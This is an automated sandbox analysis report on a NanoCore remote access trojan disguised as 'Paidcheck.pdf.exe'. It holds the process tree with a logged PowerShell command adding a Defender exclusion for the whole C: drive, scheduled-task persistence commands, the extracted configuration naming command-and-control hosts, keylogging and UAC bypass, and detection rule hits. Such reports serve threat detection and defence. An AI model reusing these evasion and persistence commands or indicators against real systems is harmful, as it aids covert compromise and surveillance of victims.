
Windows Analysis Report Paidcheck.pdf.exe

Overview

General Information

Sample Name: Paidcheck.pdf.exe
Analysis ID: 452385
MD5: ce32e8605adb6c9bb2dcee69fe887b46
SHA1: 2ace1fb1e3523768003b61a4a79193214ffafed9
SHA256: 7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Paidcheck.pdf.exe (PID: 4608 cmdline: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' MD5: CE32E8605ADB6C9BB2DCEE69FE887B46)
    • wscript.exe (PID: 1968 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 2308 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 5636 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5848 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 5432 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 496 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 4300 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp; Rule: JoeSecurity_Nanocore; Description: Yara detected Nanocore RAT; Author: Joe Security
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp; Rule: Nanocore_RAT_Gen_2; Description: Detects the Nanocore RAT; Author: Florian Roth
  • 0x59eb:$x1: NanoCore.ClientPluginHost
  • 0x5b48:$x2: IClientNetworkHost
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp; Rule: Nanocore_RAT_Feb18_1; Description: Detects Nanocore RAT; Author: Florian Roth
  • 0x59eb:$x2: NanoCore.ClientPluginHost
  • 0x6941:$s3: PipeExists
  • 0x5be1:$s4: PipeCreated
  • 0x5a05:$s5: IClientLoggingHost
Source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp; Rule: JoeSecurity_Nanocore; Description: Yara detected Nanocore RAT; Author: Joe Security
Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp; Rule: Nanocore_RAT_Gen_2; Description: Detects the Nanocore RAT; Author: Florian Roth
  • 0x39eb:$x1: NanoCore.ClientPluginHost
  • 0x3a24:$x2: IClientNetworkHost
(44 entries in total)

Unpacked PEs

Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack; Rule: Nanocore_RAT_Gen_2; Description: Detects the Nanocore RAT; Author: Florian Roth
  • 0x16e3:$x1: NanoCore.ClientPluginHost
  • 0x171c:$x2: IClientNetworkHost
Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack; Rule: Nanocore_RAT_Feb18_1; Description: Detects Nanocore RAT; Author: Florian Roth
  • 0x16e3:$x2: NanoCore.ClientPluginHost
  • 0x1800:$s4: PipeCreated
  • 0x16fd:$s5: IClientLoggingHost
Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack; Rule: Nanocore_RAT_Gen_2; Description: Detects the Nanocore RAT; Author: Florian Roth
  • 0x39eb:$x1: NanoCore.ClientPluginHost
  • 0x3a24:$x2: IClientNetworkHost
Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack; Rule: Nanocore_RAT_Feb18_1; Description: Detects Nanocore RAT; Author: Florian Roth
  • 0x39eb:$x2: NanoCore.ClientPluginHost
  • 0x3b36:$s4: PipeCreated
  • 0x3a05:$s5: IClientLoggingHost
Source: 10.2.RegAsm.exe.6540000.24.raw.unpack; Rule: Nanocore_RAT_Gen_2; Description: Detects the Nanocore RAT; Author: Florian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
(148 entries in total)

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

Sigma detected: Suspicious Process Start Without DLL
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started; Author: Florian Roth, Max Altgelt; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
Sigma detected: WScript or CScript Dropper
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1968, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', ProcessId: 748
Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Paidcheck.pdf.exe; Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe; Avira: detection malicious, Label: HEUR/AGEN.1118541
Found malware configuration
Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp; Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe; ReversingLabs: Detection: 32%
Yara detected Nanocore RAT
Source: Yara match; File source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Paidcheck.pdf.exe; Joe Sandbox ML: detected
Source: 10.2.RegAsm.exe.5f60000.23.unpack; Avira: Label: TR/NanoCore.fadte
Source: 10.2.RegAsm.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen7
Source: Paidcheck.pdf.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Paidcheck.pdf.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h] 10_2_06CC0C90
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h] 10_2_06CC0CA0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 217.138.212.57:2018
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: annapro.linkpc.net
Source: Malware configuration extractor; URLs: 217.138.212.57
Source: global traffic; TCP traffic: 192.168.2.3:49704 -> 217.138.212.57:2018
Source: Joe Sandbox View; ASN Name: M247GB M247GB
Source: unknown; TCP traffic detected without corresponding DNS query: 217.138.212.57 (50 identical entries)
Source: powershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmp; String found in binary or memory: http://crl.micr
Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp; String found in binary or memory: http://crl.microso
Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp; String found in binary or memory: http://crl.microsofX
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp; String found in binary or memory: http://google.com
Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.typography.netD
